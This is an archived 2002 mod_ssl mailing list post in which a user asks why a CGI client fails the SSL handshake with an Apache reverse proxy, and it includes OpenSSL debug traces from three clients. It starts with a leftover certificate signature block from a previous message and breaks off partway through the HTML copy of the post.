BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAxMTIyMDE5MzY0MVoXDTAzMDIxMzE5MzY0MVowgasx
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRwwGgYD
VQQKExNUQyBUcnVzdENlbnRlciBHbWJIMRQwEgYDVQQLEwtFbnR3aWNrbHVuZzEaMBgGA1UE
AxQRR8hvdHogQmFiaW4tRWJlbGwxKDAmBgkqhkiG9w0BCQEWGWJhYmluZWJlbGxAVHJ1c3RD
ZW50ZXIuZGUwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJ/3ycGGjVT5EscfUOG8hxtx
Jbpf1YMyVNMgB6yejtwWhbkVoKtV0OH7UxvTt8ukC9a65lWbiU2epyZIVhv2Ugm8wq3KWcb2
BSqCasQz4X3Rvu3RO5/8FehNDw0tGWm/sQk6z/DAGN/miSCj/kygw3cgoVGyTnCTgFaeKqpE
Oi9bAgMBAAGjgdMwgdAwDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwPgYJYIZIAYb4
QgEIBDEWL2h0dHA6Ly93d3cudHJ1c3RjZW50ZXIuZGUvZ3VpZGVsaW5lcy9pbmRleC5odG1s
MBEGCWCGSAGG+EIBAQQEAwIFoDBdBglghkgBhvhCAQMEUBZOaHR0cHM6Ly93d3cudHJ1c3Rj
ZW50ZXIuZGUvY2dpLWJpbi9jaGVjay1yZXYuY2dpL0VDQkQwMDAwMDAwMjA2RUZEN0NEMEQz
NzRCMTI/MA0GCSqGSIb3DQEBBQUAA4GBACwDd5W2864lKkg4T1xXbcCzRaUwk7CbgbUAgQB6
7Q+xNTpPq9AHFtL2FsV+FZjwfhNqAOCRCxqIyHhc3TcN7TGNdVPwVEkliHw0+RIRxPTO55ss
JGQ6ZKBqVokXdeSyOLSTFNWRrxVGAtuhOwkvxGuNUcUwDgqhpjLL1OCfhQkDMIIDwTCCAyqg
AwIBAgIPAOy9AAAAAgbv180NN0sSMA0GCSqGSIb3DQEBBQUAMIG8MQswCQYDVQQGEwJERTEQ
MA4GA1UECBMHSGFtYnVyZzEQMA4GA1UEBxMHSGFtYnVyZzE6MDgGA1UEChMxVEMgVHJ1c3RD
ZW50ZXIgZm9yIFNlY3VyaXR5IGluIERhdGEgTmV0d29ya3MgR21iSDEiMCAGA1UECxMZVEMg
VHJ1c3RDZW50ZXIgQ2xhc3MgMyBDQTEpMCcGCSqGSIb3DQEJARYaY2VydGlmaWNhdGVAdHJ1
c3RjZW50ZXIuZGUwHhcNMDExMjIwMTkzNjQxWhcNMDMwMjEzMTkzNjQxWjCBqzELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxHDAaBgNVBAoTE1RD
IFRydXN0Q2VudGVyIEdtYkgxFDASBgNVBAsTC0VudHdpY2tsdW5nMRowGAYDVQQDFBFHyG90
eiBCYWJpbi1FYmVsbDEoMCYGCSqGSIb3DQEJARYZYmFiaW5lYmVsbEBUcnVzdENlbnRlci5k
ZTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAn/fJwYaNVPkSxx9Q4byHG3Elul/VgzJU
0yAHrJ6O3BaFuRWgq1XQ4ftTG9O3y6QL1rrmVZuJTZ6nJkhWG/ZSCbzCrcpZxvYFKoJqxDPh
fdG+7dE7n/wV6E0PDS0Zab+xCTrP8MAY3+aJIKP+TKDDdyChUbJOcJOAVp4qqkQ6L1sCAwEA
AaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4GA1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYv
aHR0cDovL3d3dy50cnVzdGNlbnRlci5kZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZI
AYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIBAwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5k
ZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kvRUNCRDAwMDAwMDAyMDZFRkQ3Q0QwRDM3NEIxMj8w
DQYJKoZIhvcNAQEFBQADgYEALAN3lbbzriUqSDhPXFdtwLNFpTCTsJuBtQCBAHrtD7E1Ok+r
0AcW0vYWxX4VmPB+E2oA4JELGojIeFzdNw3tMY11U/BUSSWIfDT5EhHE9M7nmywkZDpkoGpW
iRd15LI4tJMU1ZGvFUYC26E7CS/Ea41RxTAOCqGmMsvU4J+FCQMxggMSMIIDDgIBATCB0DCB
vDELMAkGA1UEBhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4
BgNVBAoTMVRDIFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdt
YkgxIjAgBgNVBAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEW
GmNlcnRpZmljYXRlQHRydXN0Y2VudGVyLmRlAg8A7L0AAAACBu/XzQ03SxIwCQYFKw4DAhoF
AKCCAZcwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0BCQUxDxcNMDIwNjE5
MTQwNjA1WjAjBgkqhkiG9w0BCQQxFgQUaPnv3Oj3gbvkPvGwnGWZ5yeY9+8wUgYJKoZIhvcN
AQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZIhvcNAwICAUAwBwYF
Kw4DAgcwDQYIKoZIhvcNAwICASgwgeMGCyqGSIb3DQEJEAILMYHToIHQMIG8MQswCQYDVQQG
EwJERTEQMA4GA1UECBMHSGFtYnVyZzEQMA4GA1UEBxMHSGFtYnVyZzE6MDgGA1UEChMxVEMg
VHJ1c3RDZW50ZXIgZm9yIFNlY3VyaXR5IGluIERhdGEgTmV0d29ya3MgR21iSDEiMCAGA1UE
CxMZVEMgVHJ1c3RDZW50ZXIgQ2xhc3MgMyBDQTEpMCcGCSqGSIb3DQEJARYaY2VydGlmaWNh
dGVAdHJ1c3RjZW50ZXIuZGUCDwDsvQAAAAIG79fNDTdLEjANBgkqhkiG9w0BAQEFAASBgD+u
dx67gAF4GGJsrWdprnfjE7nUGKZ17AHffyFyUwslWcV7U7GoDf571ZZdfvClEzlUao87Zu1l
9Ys3L9GPW+u9va4Pardk98DNiWaS2gkRuYw9LZVKhtD/ohk7WVmI26VlAQfN8/yt6RBixJi/
OYF7shOFrzJwllk4g2klggGMAAAAAAAA
--------------ms070006080701010606090704--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:20:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00682; Thu, 20 Jun 2002 22:17:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00209; Thu, 20 Jun 2002 22:13:37 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 91A904CE7AB; Thu, 20 Jun 2002 22:13:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B6BA2286BB; Thu, 20 Jun 2002 19:35:09 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from phil2.credit-agricole.fr id PAA26525; Thu, 20 Jun 2002 15:19:07 +0200 (MET DST)
From: Pierre.HURET@euro-securities-partners.com
Received: from srv-rm.ca-sctbrunoy.fr (smtp.ca-sctbrunoy.fr [158.191.105.6])
	by phil2.credit-agricole.fr (Mirapoint Messaging Server MOS 3.1.0.54-GA)
	with ESMTP id AAO12693;
	Thu, 20 Jun 2002 15:27:17 +0100 (CET)
Received: from srv-rm.ca-sctbrunoy.fr (unverified) by srv-rm.ca-sctbrunoy.fr
 (Content Technologies SMTPRS 4.2.1) with SMTP id  for ;
 Thu, 20 Jun 2002 15:23:23 +0200
Received: from 10.105.32.23 by srv-rm.ca-sctbrunoy.fr (InterScan E-Mail VirusWall NT); Thu, 20 Jun 2002 15:23:22 +0200
Received: from Reseaux.esp.intra (unverified) by Reseaux.esp.intra
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Thu, 20 Jun 2002 15:14:09 +0200
Received: from 10.105.32.19 by Reseaux.esp.intra (InterScan E-Mail VirusWall NT); Thu, 20 Jun 2002 15:14:09 +0200
content-class: urn:content-classes:message
Subject: Unable to estabish a SSL session
MIME-Version: 1.0
Content-Type: multipart/mixed ; boundary="----=_NextPartTM-000-20d68d7b-d1ab-4724-b061-d7c2bd768b9f"
Date: Thu, 20 Jun 2002 15:19:24 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Message-ID: <2DF7FDEFFF4D2746B645F7728881B46A04E12A@mercure.ESP.INTRA>
Thread-Topic: Unable to estabish a SSL session
Thread-Index: AcIYXSDtswzvMJaxSaKuiH+Ot1FaAw==
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Pierre.HURET@euro-securities-partners.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPartTM-000-20d68d7b-d1ab-4724-b061-d7c2bd768b9f
Content-Type: multipart/alternative ; boundary="----_=_NextPart_001_01C2185D.18DF6E1A"

------_=_NextPart_001_01C2185D.18DF6E1A
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,

I try to replace an IBM edge server reverse proxy, by an APACHE 2.0.36 /
Mod_proxy / Mod_ssl / openssl  0.9.6d. The Reverse proxy deal the SSL
part with client, and work with my back end Server in HTTP.

I have 3 type of client which reach the Reverse Proxy : Standard
Browsers, Java client and CGI client. All of them call the same URL:
https://..........

All 3 client work fine with IBM Reverse Proxy. Only 2 of 3 clients work
fine with Apache Reverse Proxy: I'am not able to find why the CGI client
cannot establish an SSL session !

I'm searching some news ways to find the solution: a new trace, some
particulary settings, etc ...
Does someone knows how to read through the "BIO DUMP" ?

Here are the 3 traces from the 3 clients ( ssl_engine_log ):

######################From an IE 6
Browsers##########################################################
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Handshake: start
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: before/accept
initialization
[20/Jun/2002 13:31:25 14914] [debug] OpenSSL: read 11/11 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 00 00 61 01 00 00-5d 03                    ....a...].
|
| 000b - 
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:31:25 14914] [debug] OpenSSL: read 91/91 bytes from
BIO#301A2CC8 [mem: 301AC733] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 3d 11 be 01 d5 f6 b1 23-d5 62 52 d3 b1 4b d7 7d
=3D......#.bR..K.} |
| 0010: dc bd 91 70 ea 40 df 3e-3d a2 21 a6 bd 40 db e2
...p.@.>=3D.!..@.. |
| 0020: 20 29 bf bf 69 76 ad 4e-3e 78 73 1d 80 68 10 db
)..iv.N>xs..h.. |
| 0030: 44 41 68 8d f0 62 2f 96-c2 81 1a fa 2d a0 f1 f4
DAh..b/.....-... |
| 0040: 1b 00 16 00 04 00 05 00-0a 00 09 00 64 00 62 00
............d.b. |
| 0050: 03 00 06 00 13 00 12 00-63 01                    ........c.
|
| 005b - 
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:31:25 14914] [trace] Inter-Process Session Cache:
request=3DGET status=3DFOUND
id=3D29BFBF6976AD4E3E78731D806810DB4441688DF0622F96C2811AFA2DA0F1F41B
(session reuse)
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 write finished
A
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 flush data
[20/Jun/2002 13:31:25 14914] [debug] OpenSSL: read 5/5 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 14 03 00 00 01                                   .....
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:31:25 14914] [debug] OpenSSL: read 1/1 bytes from
BIO#301A2CC8 [mem: 301AC72D] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 01                                               .
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:31:25 14914] [debug] OpenSSL: read 5/5 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 00 00 38                                   ....8
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:31:25 14914] [debug] OpenSSL: read 56/56 bytes from
BIO#301A2CC8 [mem: 301AC72D] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 13 3a af b4 52 6a a1 f9-40 8b 29 2b 03 3f 36 f8
.:..Rj..@.)+.?6. |
| 0010: bc e0 2c 98 c1 ba 88 d8-db ff 43 5d 01 af 36 47
..,.......C]..6G |
| 0020: 76 81 2d 1b b1 a9 b1 75-fb 1c b6 49 70 04 d5 30
v.-....u...Ip..0 |
| 0030: da fa cd a0 82 98 12 ae-                         ........
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 read finished
A
[20/Jun/2002 13:31:25 14914] [trace] OpenSSL: Handshake: done


#############################FROM a JAVA client
#######################################

[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Handshake: start
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: before/accept
initialization
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 11/11 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 01 00 5d 01 00 00-59 03 01                 ....]...Y..
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 87/87 bytes from
BIO#301A2CC8 [mem: 301AC733] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 3d 11 bd 7e 02 8f 4a 6d-a0 ca 8d 96 f8 45 bc b1
=3D..~..Jm.....E.. |
| 0010: 68 35 40 f5 de 70 1a 2b-b2 e4 bc 0a 00 90 d3 94
h5@..p.+........ |
| 0020: 20 85 e4 ff 82 ea 00 fb-fb 86 66 94 47 78 a4 98
.........f.Gx.. |
| 0030: 5d d4 5b e2 85 a1 b8 3a-ce 7c 0a 3e 25 85 27 92
].[....:.|.>%.'. |
| 0040: 07 00 12 00 04 00 05 00-09 00 0a 00 03 00 08 00
................ |
| 0050: 06 00 01 00 02 01                                ......
|
| 0057 - 
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [trace] Inter-Process Session Cache:
request=3DGET status=3DMISSED
id=3D85E4FF82EA00FBFB8666944778A4985DD45BE285A1B83ACE7C0A3E2585279207
(session renewal)
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write
certificate A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write server
done A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 flush data
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 5/5 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 01 00 46                                   ....F
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 70/70 bytes from
BIO#301A2CC8 [mem: 301AC72D] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 10 00 00 42 00 40 36 5b-7b db 01 6a c6 dc 3f 3d
...B.@6[{..j..?=3D |
| 0010: f8 a4 36 c4 1a 9a 48 91-da 6a 93 88 4f 8f 56 17
..6...H..j..O.V. |
| 0020: d0 c1 2e ec 37 72 d1 af-2c 04 2b a0 e6 01 41 fd
....7r..,.+...A. |
| 0030: d8 16 f5 4e e5 fc 47 66-01 61 2c 8e 87 ac 9f bb
...N..Gf.a,..... |
| 0040: 38 fb 4a b2 02 53                                8.J..S
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 read client
key exchange A
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 5/5 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 14 03 01 00 01                                   .....
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 1/1 bytes from
BIO#301A2CC8 [mem: 301AC72D] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 01                                               .
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 5/5 bytes from
BIO#301A2CC8 [mem: 301AC728] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 01                                         ...
|
| 0005 - 
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [debug] OpenSSL: read 32/32 bytes from
BIO#301A2CC8 [mem: 301AC72D] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: b7 af 39 95 65 14 be c0-55 e8 df 25 b9 fe 62 e2
..9.e...U..%..b. |
| 0010: 80 eb 47 74 8b 74 cd 09-3d cf 1f a3 a7 85 2d 99
..Gt.t..=3D.....-. |
+-----------------------------------------------------------------------
--+
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 read finished
A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 write finished
A
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Loop: SSLv3 flush data
[20/Jun/2002 13:30:38 10436] [trace] Inter-Process Session Cache:
request=3DSET status=3DOK
id=3DBAF123503A2978BE228BE6C2A7BE69CF58779AF1D98B1432175E0C745D6E3623
timeout=3D300s (session caching)
[20/Jun/2002 13:30:38 10436] [trace] OpenSSL: Handshake: done

################FROM a CGI client
##################################################

[20/Jun/2002 11:05:50 13532] [trace] OpenSSL: Handshake: start
[20/Jun/2002 11:05:50 13532] [trace] OpenSSL: Loop: before/accept
initialization
[20/Jun/2002 11:05:50 13532] [debug] OpenSSL: read 11/11 bytes from
BIO#3017F2A8 [mem: 301C7EF8] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 80 6b 01 03 01 00 42                             .k....B
|
| 000b - 
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:50 13532] [debug] OpenSSL: read 98/98 bytes from
BIO#3017F2A8 [mem: 301C7F03] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 00 00 16 00 00 13 00 00-0a 00 00 07 00 00 05 00
................ |
| 0010: 00 04 00 00 15 00 00 12-00 00 09 07 00 c0 05 00
................ |
| 0020: 80 03 00 80 01 00 80 08-00 80 06 00 40 00 00 14
............@... |
| 0030: 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02
................ |
| 0040: 00 80 6d a5 18 58 b9 cd-c8 bd 02 1d 7e 20 20 6c  ..m..X......~
l |
| 0050: 46 2d ec 6b 71 ad 31 5a-fe f6 d9 19 8f ba 84 f3
F-.kq.1Z........ |
| 0060: 8b 9c                                            ..
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:50 13532] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[20/Jun/2002 11:05:50 13532] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[20/Jun/2002 11:05:50 13532] [trace] OpenSSL: Loop: SSLv3 write
certificate A
[20/Jun/2002 11:05:50 13532] [trace] handing out temporary 1024 bit DH
key
[20/Jun/2002 11:05:51 13532] [trace] OpenSSL: Loop: SSLv3 write key
exchange A
[20/Jun/2002 11:05:51 13532] [trace] OpenSSL: Loop: SSLv3 write
certificate request A
[20/Jun/2002 11:05:51 13532] [trace] OpenSSL: Loop: SSLv3 flush data
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from
BIO#3017F2A8 [mem: 301C7EF8] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 01 00 07                                   .....
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 7/7 bytes from
BIO#3017F2A8 [mem: 301C7EFD] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 0b 00 00 03                                      ....
|
| 0007 - 
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [trace] OpenSSL: Loop: SSLv3 read client
certificate A
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from
BIO#3017F2A8 [mem: 301C7EF8] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 01 00 86                                   .....
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 134/134 bytes from
BIO#3017F2A8 [mem: 301C7EFD] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 10 00 00 82 00 80 86 ab-42 68 68 eb 1d b1 7c 97
........Bhh...|. |
| 0010: 3d 0d da 91 a4 3d 5f f6-c7 6f 07 a9 9b 41 98 c4
=3D....=3D_..o...A.. |
| 0020: 20 88 89 99 32 4c 52 92-e1 9c 35 1b 19 84 18 b2
...2LR...5..... |
| 0030: 7d ac b0 d2 08 05 51 16-bf 9d d8 d2 26 15 dc a3
}.....Q.....&... |
| 0040: a3 f8 ae fc fc 2b 9f 57-a2 6d f8 46 a3 08 4a 49
.....+.W.m.F..JI |
| 0050: dd 8d cd b6 2f a3 49 13-8b 11 86 d0 49 10 05 b6
..../.I.....I... |
| 0060: 44 09 9f c0 1d 0d db 96-34 e2 f1 34 a3 e6 7a f5
D.......4..4..z. |
| 0070: 8e a7 31 60 62 0a 87 51-f4 87 a8 69 3c 2b 65 b8
..1`b..Q...i<+e. |
| 0080: 9f bc 6e 16 2d f7                                ..n.-.
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [trace] OpenSSL: Loop: SSLv3 read client
key exchange A
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from
BIO#3017F2A8 [mem: 301C7EF8] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 14 03 01 00 01                                   .....
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 1/1 bytes from
BIO#3017F2A8 [mem: 301C7EFD] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 01                                               .
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 5/5 bytes from
BIO#3017F2A8 [mem: 301C7EF8] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: 16 03 01 00 28                                   ....(
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [debug] OpenSSL: read 40/40 bytes from
BIO#3017F2A8 [mem: 301C7EFD] (BIO dump follows)
+-----------------------------------------------------------------------
--+
| 0000: db 7a 62 c2 e4 f9 08 b7-de 2a a7 c9 65 16 f0 97
.zb......*..e... |
| 0010: 66 9f 32 fc 10 ea 0d 02-49 9f 26 12 fe 2c 83 d1
f.2.....I.&..,.. |
| 0020: ef 66 40 32 5f cd d5 61-                         .f@2_..a
|
+-----------------------------------------------------------------------
--+
[20/Jun/2002 11:05:52 13532] [trace] OpenSSL: Write: SSLv3 read
certificate verify A
[20/Jun/2002 11:05:52 13532] [trace] OpenSSL: Exit: error in SSLv3 read
certificate verify A
[20/Jun/2002 11:05:52 13532] [trace] OpenSSL: Exit: error in SSLv3 read
certificate verify A
[20/Jun/2002 11:05:52 13532] [error] SSL handshake failed (server
www.tst.creditagricol.fr:443, client 10.117.5.4) (OpenSSL library error
follows)
[20/Jun/2002 11:05:52 13532] [error] OpenSSL: error:1408F455:SSL
routines:SSL3_GET_RECORD:decryption failed or bad record mac

########################################################################
########################

Thanks in advance for your help.


Cordialement,
=20
Pierre HURET
Mail: pierre.huret@ca-sctbrunoy.fr




---------------------------------------------------------------------

Ce message et toutes les pieces jointes sont a l'intention exclusive de ses=
 destinataires et sont confidentiels. Si vous recevez ce message par erreur=
, merci de le detruire et d'en avertir immediatement l'expediteur.
Toute utilisation de ce message non conforme a sa destination, toute diffus=
ion ou toute duplication, totale ou partielle, est interdite, sauf autorisa=
tion prealable.
L'internet ne permettant pas d'assurer l'integrite de ce message, nous decl=
inons toute responsabilite au titre de ce message, dans l'hypothese ou il a=
urait ete modifie.

               -------------------

This message and any attachements are intended solely for the addressees an=
d are confidential. If you receive this message by error, please delete it =
and immediately notify the sender.
Any use not in accord with its purpose, any dissemination or disclosure, ei=
ther whole or partial, is prohibited except previous approval.
The internet can not guarantee the integrity of this message. We will  not =
therefore be liable for the message if modified.

---------------------------------------------------------------------

------_=_NextPart_001_01C2185D.18DF6E1A
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






Unable to estabish a SSL session





Hi,



I try to re=
place an IBM edge server reverse proxy, by an APACHE 2.0.36 / Mod_proxy / M=
od_ssl / openssl  0.9.6d. The Reverse proxy deal the SSL part with cli=
ent, and work with my back end Server in HTTP.



I have 3 ty=
pe of client which reach the Reverse Proxy : Standard Browsers, Java client=
 and CGI client. All of them call the same URL: https://..........



All 3 clien=
t work fine with IBM Reverse Proxy. Only 2 of 3 clients work fine with Apac=
he Reverse Proxy: I’am not able to find why the CGI client cannot est=
ablish an SSL session !



I’m s=
earching some news ways to find the solution: a new trace, some particulary=
 settings, etc …



Does someon=
e knows how to read through the “BIO DUMP” ?



Here are th=
e 3 traces from the 3 clients ( ssl_engine_log ):



###########=
###########From an IE 6 Browsers###########################################=
###############



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Handshake: start



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: before/accept initialization



[20/Jun/200=
2 13:31:25 14914] [debug] OpenSSL: read 11/11 bytes from BIO#301A2CC8 [mem:=
 301AC728] (BIO dump follows)



+---------------------------------------------------------------=
----------+



| 0000: 16 03 =
00 00 61 01 00 00-5d 03        &nbs=
p;           ....a...].&n=
bsp;      |



| 000b - <S=
PACES/NULS>



+---------------------------------=
----------------------------------------+



[20/Jun/200=
2 13:31:25 14914] [debug] OpenSSL: read 91/91 bytes from BIO#301A2CC8 [mem:=
 301AC733] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 3d =
11 be 01 d5 f6 b1 23-d5 62 52 d3 b1 4b d7 7d  =3D......#.bR..K.} |



| 0010: dc =
bd 91 70 ea 40 df 3e-3d a2 21 a6 bd 40 db e2  ...p.@.>=3D.!..@.. |<=
/FONT>



| 0020: 20 =
29 bf bf 69 76 ad 4e-3e 78 73 1d 80 68 10 db   )..iv.N>xs..h..=
 |



| 0030: 44 =
41 68 8d f0 62 2f 96-c2 81 1a fa 2d a0 f1 f4  DAh..b/.....-... |



| 0040: 1b =
00 16 00 04 00 05 00-0a 00 09 00 64 00 62 00  ............d.b. |



| 0050: 03 =
00 06 00 13 00 12 00-63 01        &=
nbsp;           ........c=
.       |



| 005b - &l=
t;SPACES/NULS>



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:31:25 14914] [trace] Inter-Process Session Cache: request=3DGET status=
=3DFOUND id=3D29BFBF6976AD4E3E78731D806810DB4441688DF0622F96C2811AFA2DA0F1F=
41B (session reuse)



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 read client hello A



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 write server hello A<=
/SPAN>



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 write change cipher spec A



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 write finished A



[20/Jun/200=
2 13:31:25 14914] [trace] OpenSSL: Loop: SSLv3 flush data



[20/Jun/200=
2 13:31:25 14914] [debug] OpenSSL: read 5/5 bytes from BIO#301A2CC8 [mem: 3=
01AC728] (BIO dump follows)



+----------=
---------------------------------------------------------------+



| 0000: 14 =
03 00 00 01          &nbs=
p;            &=
nbsp;           .....&nbs=
p;           |



+----------=
---------------------------------------------------------------+



[20/Jun/200=
2 13:31:25 14914] [debug] OpenSSL: read 1/1 bytes from BIO#301A2CC8 [mem: 3=
01AC72D] (BIO dump follows)



+----------=
---------------------------------------------------------------+



